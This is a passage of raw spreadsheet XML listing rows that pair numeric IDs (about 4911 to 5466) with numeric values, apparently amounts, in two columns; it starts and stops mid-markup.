        <v>150000</v>
      </c>
    </row>
    <row r="1016" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1016">
        <v>4911</v>
      </c>
      <c r="B1016" s="8">
        <v>2500000</v>
      </c>
    </row>
    <row r="1017" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1017">
        <v>4913</v>
      </c>
      <c r="B1017" s="8">
        <v>200000</v>
      </c>
    </row>
    <row r="1018" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1018">
        <v>4915</v>
      </c>
      <c r="B1018" s="8">
        <v>3700</v>
      </c>
    </row>
    <row r="1019" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1019">
        <v>4919</v>
      </c>
      <c r="B1019" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="1020" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1020">
        <v>4921</v>
      </c>
      <c r="B1020" s="8">
        <v>377000</v>
      </c>
    </row>
    <row r="1021" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1021">
        <v>4922</v>
      </c>
      <c r="B1021" s="8">
        <v>3000</v>
      </c>
    </row>
    <row r="1022" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1022">
        <v>4923</v>
      </c>
      <c r="B1022" s="8">
        <v>4000</v>
      </c>
    </row>
    <row r="1023" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1023">
        <v>4925</v>
      </c>
      <c r="B1023" s="8">
        <v>220000</v>
      </c>
    </row>
    <row r="1024" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1024">
        <v>4934</v>
      </c>
      <c r="B1024" s="8">
        <v>900</v>
      </c>
    </row>
    <row r="1025" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1025">
        <v>4944</v>
      </c>
      <c r="B1025" s="8">
        <v>60000</v>
      </c>
    </row>
    <row r="1026" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1026">
        <v>4945</v>
      </c>
      <c r="B1026" s="8">
        <v>67000</v>
      </c>
    </row>
    <row r="1027" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1027">
        <v>4948</v>
      </c>
      <c r="B1027" s="8">
        <v>57000</v>
      </c>
    </row>
    <row r="1028" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1028">
        <v>4954</v>
      </c>
      <c r="B1028" s="8">
        <v>300000</v>
      </c>
    </row>
    <row r="1029" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1029">
        <v>4957</v>
      </c>
      <c r="B1029" s="8">
        <v>1000000</v>
      </c>
    </row>
    <row r="1030" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1030">
        <v>4958</v>
      </c>
      <c r="B1030" s="8">
        <v>10000</v>
      </c>
    </row>
    <row r="1031" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1031">
        <v>4960</v>
      </c>
      <c r="B1031" s="8">
        <v>540000</v>
      </c>
    </row>
    <row r="1032" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1032">
        <v>4962</v>
      </c>
      <c r="B1032" s="8">
        <v>852460</v>
      </c>
    </row>
    <row r="1033" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1033">
        <v>4963</v>
      </c>
      <c r="B1033" s="8">
        <v>1500</v>
      </c>
    </row>
    <row r="1034" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1034">
        <v>4964</v>
      </c>
      <c r="B1034" s="8">
        <v>95000</v>
      </c>
    </row>
    <row r="1035" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1035">
        <v>4965</v>
      </c>
      <c r="B1035" s="8">
        <v>400000</v>
      </c>
    </row>
    <row r="1036" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1036">
        <v>4967</v>
      </c>
      <c r="B1036" s="8">
        <v>93000</v>
      </c>
    </row>
    <row r="1037" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1037">
        <v>4969</v>
      </c>
      <c r="B1037" s="8">
        <v>30000</v>
      </c>
    </row>
    <row r="1038" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1038">
        <v>4978</v>
      </c>
      <c r="B1038" s="8">
        <v>1000000</v>
      </c>
    </row>
    <row r="1039" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1039">
        <v>4982</v>
      </c>
      <c r="B1039" s="8">
        <v>1000</v>
      </c>
    </row>
    <row r="1040" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1040">
        <v>4995</v>
      </c>
      <c r="B1040" s="8">
        <v>630000</v>
      </c>
    </row>
    <row r="1041" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1041">
        <v>4998</v>
      </c>
      <c r="B1041" s="8">
        <v>624000</v>
      </c>
    </row>
    <row r="1042" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1042">
        <v>5002</v>
      </c>
      <c r="B1042" s="8">
        <v>12000</v>
      </c>
    </row>
    <row r="1043" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1043">
        <v>5003</v>
      </c>
      <c r="B1043" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="1044" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1044">
        <v>5004</v>
      </c>
      <c r="B1044" s="8">
        <v>92327.001250000001</v>
      </c>
    </row>
    <row r="1045" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1045">
        <v>5005</v>
      </c>
      <c r="B1045" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="1046" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1046">
        <v>5007</v>
      </c>
      <c r="B1046" s="8">
        <v>600000</v>
      </c>
    </row>
    <row r="1047" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1047">
        <v>5010</v>
      </c>
      <c r="B1047" s="8">
        <v>510000</v>
      </c>
    </row>
    <row r="1048" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1048">
        <v>5011</v>
      </c>
      <c r="B1048" s="8">
        <v>5000</v>
      </c>
    </row>
    <row r="1049" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1049">
        <v>5020</v>
      </c>
      <c r="B1049" s="8">
        <v>900000</v>
      </c>
    </row>
    <row r="1050" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1050">
        <v>5025</v>
      </c>
      <c r="B1050" s="8">
        <v>400000</v>
      </c>
    </row>
    <row r="1051" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1051">
        <v>5030</v>
      </c>
      <c r="B1051" s="8">
        <v>720000</v>
      </c>
    </row>
    <row r="1052" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1052">
        <v>5031</v>
      </c>
      <c r="B1052" s="8">
        <v>1788</v>
      </c>
    </row>
    <row r="1053" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1053">
        <v>5034</v>
      </c>
      <c r="B1053" s="8">
        <v>60000</v>
      </c>
    </row>
    <row r="1054" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1054">
        <v>5039</v>
      </c>
      <c r="B1054" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="1055" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1055">
        <v>5049</v>
      </c>
      <c r="B1055" s="8">
        <v>300000</v>
      </c>
    </row>
    <row r="1056" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1056">
        <v>5053</v>
      </c>
      <c r="B1056" s="8">
        <v>2000</v>
      </c>
    </row>
    <row r="1057" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1057">
        <v>5057</v>
      </c>
      <c r="B1057" s="8">
        <v>67000</v>
      </c>
    </row>
    <row r="1058" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1058">
        <v>5061</v>
      </c>
      <c r="B1058" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="1059" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1059">
        <v>5065</v>
      </c>
      <c r="B1059" s="8">
        <v>42000</v>
      </c>
    </row>
    <row r="1060" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1060">
        <v>5066</v>
      </c>
      <c r="B1060" s="8">
        <v>12000000</v>
      </c>
    </row>
    <row r="1061" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1061">
        <v>5067</v>
      </c>
      <c r="B1061" s="8">
        <v>20000</v>
      </c>
    </row>
    <row r="1062" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1062">
        <v>5070</v>
      </c>
      <c r="B1062" s="8">
        <v>170000</v>
      </c>
    </row>
    <row r="1063" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1063">
        <v>5073</v>
      </c>
      <c r="B1063" s="8">
        <v>24000</v>
      </c>
    </row>
    <row r="1064" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1064">
        <v>5074</v>
      </c>
      <c r="B1064" s="8">
        <v>1000000</v>
      </c>
    </row>
    <row r="1065" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1065">
        <v>5075</v>
      </c>
      <c r="B1065" s="8">
        <v>500000</v>
      </c>
    </row>
    <row r="1066" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1066">
        <v>5078</v>
      </c>
      <c r="B1066" s="8">
        <v>2500</v>
      </c>
    </row>
    <row r="1067" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1067">
        <v>5079</v>
      </c>
      <c r="B1067" s="8">
        <v>2500</v>
      </c>
    </row>
    <row r="1068" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1068">
        <v>5083</v>
      </c>
      <c r="B1068" s="8">
        <v>480</v>
      </c>
    </row>
    <row r="1069" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1069">
        <v>5086</v>
      </c>
      <c r="B1069" s="8">
        <v>300000</v>
      </c>
    </row>
    <row r="1070" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1070">
        <v>5087</v>
      </c>
      <c r="B1070" s="8">
        <v>10000</v>
      </c>
    </row>
    <row r="1071" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1071">
        <v>5088</v>
      </c>
      <c r="B1071" s="8">
        <v>10000</v>
      </c>
    </row>
    <row r="1072" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1072">
        <v>5090</v>
      </c>
      <c r="B1072" s="8">
        <v>190000</v>
      </c>
    </row>
    <row r="1073" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1073">
        <v>5093</v>
      </c>
      <c r="B1073" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="1074" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1074">
        <v>5095</v>
      </c>
      <c r="B1074" s="8">
        <v>15000</v>
      </c>
    </row>
    <row r="1075" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1075">
        <v>5096</v>
      </c>
      <c r="B1075" s="8">
        <v>50000</v>
      </c>
    </row>
    <row r="1076" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1076">
        <v>5098</v>
      </c>
      <c r="B1076" s="8">
        <v>80000</v>
      </c>
    </row>
    <row r="1077" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1077">
        <v>5101</v>
      </c>
      <c r="B1077" s="8">
        <v>360</v>
      </c>
    </row>
    <row r="1078" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1078">
        <v>5102</v>
      </c>
      <c r="B1078" s="8">
        <v>900000</v>
      </c>
    </row>
    <row r="1079" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1079">
        <v>5103</v>
      </c>
      <c r="B1079" s="8">
        <v>120</v>
      </c>
    </row>
    <row r="1080" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1080">
        <v>5105</v>
      </c>
      <c r="B1080" s="8">
        <v>5000</v>
      </c>
    </row>
    <row r="1081" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1081">
        <v>5106</v>
      </c>
      <c r="B1081" s="8">
        <v>600000</v>
      </c>
    </row>
    <row r="1082" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1082">
        <v>5108</v>
      </c>
      <c r="B1082" s="8">
        <v>600000</v>
      </c>
    </row>
    <row r="1083" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1083">
        <v>5112</v>
      </c>
      <c r="B1083" s="8">
        <v>300</v>
      </c>
    </row>
    <row r="1084" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1084">
        <v>5113</v>
      </c>
      <c r="B1084" s="8">
        <v>4750</v>
      </c>
    </row>
    <row r="1085" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1085">
        <v>5114</v>
      </c>
      <c r="B1085" s="8">
        <v>1000</v>
      </c>
    </row>
    <row r="1086" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1086">
        <v>5115</v>
      </c>
      <c r="B1086" s="8">
        <v>30000</v>
      </c>
    </row>
    <row r="1087" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1087">
        <v>5116</v>
      </c>
      <c r="B1087" s="8">
        <v>180000</v>
      </c>
    </row>
    <row r="1088" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1088">
        <v>5117</v>
      </c>
      <c r="B1088" s="8">
        <v>140000</v>
      </c>
    </row>
    <row r="1089" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1089">
        <v>5118</v>
      </c>
      <c r="B1089" s="8">
        <v>720000</v>
      </c>
    </row>
    <row r="1090" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1090">
        <v>5120</v>
      </c>
      <c r="B1090" s="8">
        <v>50000</v>
      </c>
    </row>
    <row r="1091" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1091">
        <v>5123</v>
      </c>
      <c r="B1091" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="1092" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1092">
        <v>5124</v>
      </c>
      <c r="B1092" s="8">
        <v>16000</v>
      </c>
    </row>
    <row r="1093" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1093">
        <v>5125</v>
      </c>
      <c r="B1093" s="8">
        <v>2400</v>
      </c>
    </row>
    <row r="1094" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1094">
        <v>5126</v>
      </c>
      <c r="B1094" s="8">
        <v>1800000</v>
      </c>
    </row>
    <row r="1095" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1095">
        <v>5131</v>
      </c>
      <c r="B1095" s="8">
        <v>400000</v>
      </c>
    </row>
    <row r="1096" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1096">
        <v>5136</v>
      </c>
      <c r="B1096" s="8">
        <v>7000</v>
      </c>
    </row>
    <row r="1097" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1097">
        <v>5137</v>
      </c>
      <c r="B1097" s="8">
        <v>390000</v>
      </c>
    </row>
    <row r="1098" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1098">
        <v>5140</v>
      </c>
      <c r="B1098" s="8">
        <v>510000</v>
      </c>
    </row>
    <row r="1099" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1099">
        <v>5145</v>
      </c>
      <c r="B1099" s="8">
        <v>380000</v>
      </c>
    </row>
    <row r="1100" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1100">
        <v>5154</v>
      </c>
      <c r="B1100" s="8">
        <v>300000</v>
      </c>
    </row>
    <row r="1101" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1101">
        <v>5155</v>
      </c>
      <c r="B1101" s="8">
        <v>100000</v>
      </c>
    </row>
    <row r="1102" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1102">
        <v>5159</v>
      </c>
      <c r="B1102" s="8">
        <v>100000</v>
      </c>
    </row>
    <row r="1103" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1103">
        <v>5161</v>
      </c>
      <c r="B1103" s="8">
        <v>2000</v>
      </c>
    </row>
    <row r="1104" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1104">
        <v>5166</v>
      </c>
      <c r="B1104" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="1105" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1105">
        <v>5168</v>
      </c>
      <c r="B1105" s="8">
        <v>300000</v>
      </c>
    </row>
    <row r="1106" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1106">
        <v>5171</v>
      </c>
      <c r="B1106" s="8">
        <v>1200</v>
      </c>
    </row>
    <row r="1107" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1107">
        <v>5172</v>
      </c>
      <c r="B1107" s="8">
        <v>48000</v>
      </c>
    </row>
    <row r="1108" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1108">
        <v>5182</v>
      </c>
      <c r="B1108" s="8">
        <v>54000</v>
      </c>
    </row>
    <row r="1109" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1109">
        <v>5183</v>
      </c>
      <c r="B1109" s="8">
        <v>30000000</v>
      </c>
    </row>
    <row r="1110" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1110">
        <v>5189</v>
      </c>
      <c r="B1110" s="8">
        <v>317391</v>
      </c>
    </row>
    <row r="1111" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1111">
        <v>5190</v>
      </c>
      <c r="B1111" s="8">
        <v>1500000</v>
      </c>
    </row>
    <row r="1112" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1112">
        <v>5191</v>
      </c>
      <c r="B1112" s="8">
        <v>14500</v>
      </c>
    </row>
    <row r="1113" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1113">
        <v>5193</v>
      </c>
      <c r="B1113" s="8">
        <v>110000</v>
      </c>
    </row>
    <row r="1114" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1114">
        <v>5195</v>
      </c>
      <c r="B1114" s="8">
        <v>86400</v>
      </c>
    </row>
    <row r="1115" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1115">
        <v>5197</v>
      </c>
      <c r="B1115" s="8">
        <v>10000</v>
      </c>
    </row>
    <row r="1116" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1116">
        <v>5203</v>
      </c>
      <c r="B1116" s="8">
        <v>3960</v>
      </c>
    </row>
    <row r="1117" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1117">
        <v>5204</v>
      </c>
      <c r="B1117" s="8">
        <v>35000</v>
      </c>
    </row>
    <row r="1118" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1118">
        <v>5205</v>
      </c>
      <c r="B1118" s="8">
        <v>1000</v>
      </c>
    </row>
    <row r="1119" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1119">
        <v>5218</v>
      </c>
      <c r="B1119" s="8">
        <v>45000</v>
      </c>
    </row>
    <row r="1120" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1120">
        <v>5220</v>
      </c>
      <c r="B1120" s="8">
        <v>240</v>
      </c>
    </row>
    <row r="1121" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1121">
        <v>5221</v>
      </c>
      <c r="B1121" s="8">
        <v>700</v>
      </c>
    </row>
    <row r="1122" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1122">
        <v>5222</v>
      </c>
      <c r="B1122" s="8">
        <v>320000</v>
      </c>
    </row>
    <row r="1123" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1123">
        <v>5232</v>
      </c>
      <c r="B1123" s="8">
        <v>900</v>
      </c>
    </row>
    <row r="1124" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1124">
        <v>5234</v>
      </c>
      <c r="B1124" s="8">
        <v>325000</v>
      </c>
    </row>
    <row r="1125" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1125">
        <v>5237</v>
      </c>
      <c r="B1125" s="8">
        <v>374400</v>
      </c>
    </row>
    <row r="1126" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1126">
        <v>5238</v>
      </c>
      <c r="B1126" s="8">
        <v>31500</v>
      </c>
    </row>
    <row r="1127" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1127">
        <v>5240</v>
      </c>
      <c r="B1127" s="8">
        <v>1800000</v>
      </c>
    </row>
    <row r="1128" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1128">
        <v>5242</v>
      </c>
      <c r="B1128" s="8">
        <v>40800</v>
      </c>
    </row>
    <row r="1129" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1129">
        <v>5244</v>
      </c>
      <c r="B1129" s="8">
        <v>230000</v>
      </c>
    </row>
    <row r="1130" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1130">
        <v>5247</v>
      </c>
      <c r="B1130" s="8">
        <v>292000</v>
      </c>
    </row>
    <row r="1131" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1131">
        <v>5249</v>
      </c>
      <c r="B1131" s="8">
        <v>7200000</v>
      </c>
    </row>
    <row r="1132" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1132">
        <v>5251</v>
      </c>
      <c r="B1132" s="8">
        <v>700000</v>
      </c>
    </row>
    <row r="1133" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1133">
        <v>5254</v>
      </c>
      <c r="B1133" s="8">
        <v>830000</v>
      </c>
    </row>
    <row r="1134" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1134">
        <v>5255</v>
      </c>
      <c r="B1134" s="8">
        <v>1000</v>
      </c>
    </row>
    <row r="1135" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1135">
        <v>5256</v>
      </c>
      <c r="B1135" s="8">
        <v>2399581</v>
      </c>
    </row>
    <row r="1136" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1136">
        <v>5257</v>
      </c>
      <c r="B1136" s="8">
        <v>200</v>
      </c>
    </row>
    <row r="1137" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1137">
        <v>5258</v>
      </c>
      <c r="B1137" s="8">
        <v>540000</v>
      </c>
    </row>
    <row r="1138" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1138">
        <v>5261</v>
      </c>
      <c r="B1138" s="8">
        <v>300000</v>
      </c>
    </row>
    <row r="1139" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1139">
        <v>5270</v>
      </c>
      <c r="B1139" s="8">
        <v>2201800</v>
      </c>
    </row>
    <row r="1140" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1140">
        <v>5272</v>
      </c>
      <c r="B1140" s="8">
        <v>60</v>
      </c>
    </row>
    <row r="1141" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1141">
        <v>5273</v>
      </c>
      <c r="B1141" s="8">
        <v>120</v>
      </c>
    </row>
    <row r="1142" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1142">
        <v>5274</v>
      </c>
      <c r="B1142" s="8">
        <v>18000</v>
      </c>
    </row>
    <row r="1143" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1143">
        <v>5275</v>
      </c>
      <c r="B1143" s="8">
        <v>100</v>
      </c>
    </row>
    <row r="1144" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1144">
        <v>5276</v>
      </c>
      <c r="B1144" s="8">
        <v>4860</v>
      </c>
    </row>
    <row r="1145" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1145">
        <v>5278</v>
      </c>
      <c r="B1145" s="8">
        <v>50</v>
      </c>
    </row>
    <row r="1146" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1146">
        <v>5281</v>
      </c>
      <c r="B1146" s="8">
        <v>7500</v>
      </c>
    </row>
    <row r="1147" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1147">
        <v>5283</v>
      </c>
      <c r="B1147" s="8">
        <v>36000</v>
      </c>
    </row>
    <row r="1148" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1148">
        <v>5288</v>
      </c>
      <c r="B1148" s="8">
        <v>2135000</v>
      </c>
    </row>
    <row r="1149" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1149">
        <v>5290</v>
      </c>
      <c r="B1149" s="8">
        <v>3450000</v>
      </c>
    </row>
    <row r="1150" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1150">
        <v>5291</v>
      </c>
      <c r="B1150" s="8">
        <v>1050000</v>
      </c>
    </row>
    <row r="1151" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1151">
        <v>5293</v>
      </c>
      <c r="B1151" s="8">
        <v>5000000</v>
      </c>
    </row>
    <row r="1152" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1152">
        <v>5296</v>
      </c>
      <c r="B1152" s="8">
        <v>44500</v>
      </c>
    </row>
    <row r="1153" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1153">
        <v>5298</v>
      </c>
      <c r="B1153" s="8">
        <v>4000000</v>
      </c>
    </row>
    <row r="1154" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1154">
        <v>5299</v>
      </c>
      <c r="B1154" s="8">
        <v>3000</v>
      </c>
    </row>
    <row r="1155" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1155">
        <v>5301</v>
      </c>
      <c r="B1155" s="8">
        <v>2160</v>
      </c>
    </row>
    <row r="1156" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1156">
        <v>5304</v>
      </c>
      <c r="B1156" s="8">
        <v>430500</v>
      </c>
    </row>
    <row r="1157" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1157">
        <v>5305</v>
      </c>
      <c r="B1157" s="8">
        <v>2160000</v>
      </c>
    </row>
    <row r="1158" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1158">
        <v>5306</v>
      </c>
      <c r="B1158" s="8">
        <v>1250</v>
      </c>
    </row>
    <row r="1159" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1159">
        <v>5307</v>
      </c>
      <c r="B1159" s="8">
        <v>500000</v>
      </c>
    </row>
    <row r="1160" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1160">
        <v>5309</v>
      </c>
      <c r="B1160" s="8">
        <v>550000</v>
      </c>
    </row>
    <row r="1161" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1161">
        <v>5310</v>
      </c>
      <c r="B1161" s="8">
        <v>2220</v>
      </c>
    </row>
    <row r="1162" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1162">
        <v>5311</v>
      </c>
      <c r="B1162" s="8">
        <v>1440</v>
      </c>
    </row>
    <row r="1163" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1163">
        <v>5314</v>
      </c>
      <c r="B1163" s="8">
        <v>6750000</v>
      </c>
    </row>
    <row r="1164" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1164">
        <v>5325</v>
      </c>
      <c r="B1164" s="8">
        <v>5400000</v>
      </c>
    </row>
    <row r="1165" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1165">
        <v>5326</v>
      </c>
      <c r="B1165" s="8">
        <v>46000</v>
      </c>
    </row>
    <row r="1166" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1166">
        <v>5330</v>
      </c>
      <c r="B1166" s="8">
        <v>1600</v>
      </c>
    </row>
    <row r="1167" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1167">
        <v>5426</v>
      </c>
      <c r="B1167" s="8">
        <v>250</v>
      </c>
    </row>
    <row r="1168" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1168">
        <v>5427</v>
      </c>
      <c r="B1168" s="8">
        <v>500</v>
      </c>
    </row>
    <row r="1169" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1169">
        <v>5432</v>
      </c>
      <c r="B1169" s="8">
        <v>12000</v>
      </c>
    </row>
    <row r="1170" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1170">
        <v>5435</v>
      </c>
      <c r="B1170" s="8">
        <v>321000</v>
      </c>
    </row>
    <row r="1171" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1171">
        <v>5439</v>
      </c>
      <c r="B1171" s="8">
        <v>11380200</v>
      </c>
    </row>
    <row r="1172" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1172">
        <v>5440</v>
      </c>
      <c r="B1172" s="8">
        <v>1200</v>
      </c>
    </row>
    <row r="1173" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1173">
        <v>5444</v>
      </c>
      <c r="B1173" s="8">
        <v>53500</v>
      </c>
    </row>
    <row r="1174" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1174">
        <v>5446</v>
      </c>
      <c r="B1174" s="8">
        <v>7200</v>
      </c>
    </row>
    <row r="1175" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1175">
        <v>5451</v>
      </c>
      <c r="B1175" s="8">
        <v>80000</v>
      </c>
    </row>
    <row r="1176" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1176">
        <v>5452</v>
      </c>
      <c r="B1176" s="8">
        <v>1000</v>
      </c>
    </row>
    <row r="1177" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1177">
        <v>5454</v>
      </c>
      <c r="B1177" s="8">
        <v>210000</v>
      </c>
    </row>
    <row r="1178" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1178">
        <v>5456</v>
      </c>
      <c r="B1178" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="1179" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1179">
        <v>5461</v>
      </c>
      <c r="B1179" s="8">
        <v>240000</v>
      </c>
    </row>
    <row r="1180" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1180">
        <v>5465</v>
      </c>
      <c r="B1180" s="8">
        <v>3525000</v>
      </c>
    </row>
    <row r="1181" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1181">
        <v>5466</v>
      </c>
      <c r="B1181" s="8">
        <v>1830000</v>
      </c>
    </row>
    <row r="1182" spans="1:2" x14ac:dyDescent="0.2">
